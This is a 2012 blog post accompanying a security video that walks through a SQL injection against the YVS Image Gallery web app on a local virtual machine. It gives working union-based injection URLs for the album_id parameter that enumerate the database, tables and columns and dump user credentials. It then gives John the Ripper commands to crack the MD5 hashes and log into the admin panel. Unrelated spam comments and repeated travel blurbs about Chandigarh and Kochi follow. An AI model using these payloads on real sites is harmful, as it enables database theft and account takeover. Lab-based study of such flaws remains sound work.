[VIDEO] YVS Image Gallery – SQL Injection
| Posted in Security Videos | Posted on 01-03-2012
10
Download video: http://www.mediafire.com/?mbf1l0ql1514dq3
Brief Overview
YVS Image Gallery is a small database driven gallery created to be implemented within your existing site. Only a first attempt at the system has a long way to go, but it provides you with all the necessary tools to run your own picture gallery, such as uploading of multiple images and creation of thumbnails.
As reported by Corrado Liotta, YVS Image Gallery is vulnerable to SQL Injection. So basically what I did was to exploit this vulnerability.
Tools
- YVS Image Gallery.zip
- A virtual machine (Example: VMware Player or Virtual Box)
- Firefox – (Can be found in BackTrack 5)
- John The Ripper – (Can be found in BackTrack 5)
Commands
//Open on firefox
http://127.0.0.1/server_path/view_all_albums.php
//Check the column count
http://127.0.0.1/YVS1/view_album.php?album_id=1+order+by+1--
http://127.0.0.1/YVS1/view_album.php?album_id=1+union+select+1--
//Get the version, current user and the database name
http://127.0.0.1/server_path/view_album.php?album_id=-2+UNION+SELECT+concat(0x1e,0x1e,version(),0x1e,user(),0x1e,database(),0x1e,0x20)--
//Get all the tables in the database
http://127.0.0.1/server_path/view_album.php?album_id=-1+union+select+group_concat(table_name)+FROM+information_schema.tables+where+table_schema=database()--
//Get all the column names
http://127.0.0.1/server_path/view_album.php?album_id=-1+union+select+group_concat(column_name)+FROM+information_schema.columns+where+table_schema=database()--
//Get username & password from the table "user"
http://127.0.0.1/server_path/view_album.php?album_id=-1+union+select+concat(username,0x3a,password)+from+user--
//The password is md5 encrypted, so we have to decrypt it
//We save the username:hash in a file and name it "pwd.txt"
//We open up a terminal on our backtrack
//We need to Brute Force the user credentials for the web application using John The Ripper
cd pentest/passwords/john
./john pwd.txt --wordlist=password.txt --format=raw-MD5
//where password.txt is our password wordlist
//John the ripper then cracks the hash and gives us the password
//After which we then login to the YVS Image Gallery admin panel
##### #######
# # ## # # ###### # # # # ###### #####
# # # ## ## # # # # # # # #
# #### # # # ## # ##### # # # # ##### # #
# # ###### # # # # # # # # #####
# # # # # # # # # # # # # #
##### # # # # ###### ####### ## ###### # #
men i dont understand this page, but i love this lil bird that keeps jumping branches as i scroll down 🙂
Have you seen the video embedded? Meanwhile bring some seeds for the birdie 😉
Neat trick with the birdie, so much I inspected it on Google Chrome’s Inspected the hit ‘delete’. 😀
Search VPN? Here – http://importplan.ru
ltrfhbcnbloophy
переделка микроавтобуса из грузового в пассажирский – Бердичів – столиця переобладнання, установка электроники в микроавтобус
Жилье должно быть комфортным. Именно поэтому строительство нужно доверить профессионалам. Каждая строительная специальность по своему интересна, и может принести неплохой результат, если к ней подойти правильно
Затевать возводить принадлежащий дача надо правильно, поэтому мы рассмотрим варианты и технологии такого строительства
Chandigarh, the capital of the northern Indian states of Punjab and Haryana, was designed by the Swiss-French modernist architect, Le Corbusier. His buildings include the Capitol Complex with its High Court, Secretariat and Legislative Assembly, as well as the giant Open Hand Monument. The nearby Rock Garden is a park featuring sculptures made of stones, recycled ceramics and industrial relics.
Chandigart
Chandigarh, the capital of the northern Indian states of Punjab and Haryana, was designed by the Swiss-French modernist architect, Le Corbusier. His buildings include the Capitol Complex with its High Court, Secretariat and Legislative Assembly, as well as the giant Open Hand Monument. The nearby Rock Garden is a park featuring sculptures made of stones, recycled ceramics and industrial relics.
Kochi (also known as Cochin) is a city in southwest India’s coastal Kerala state. It has been a port since 1341, when a flood carved out its harbor and opened it to Arab, Chinese and European merchants. Sites reflecting those influences include Fort Kochi, a settlement with tiled colonial bungalows and diverse houses of worship. Cantilevered Chinese fishing nets, typical of Kochi, have been in use for centuries.
Exchange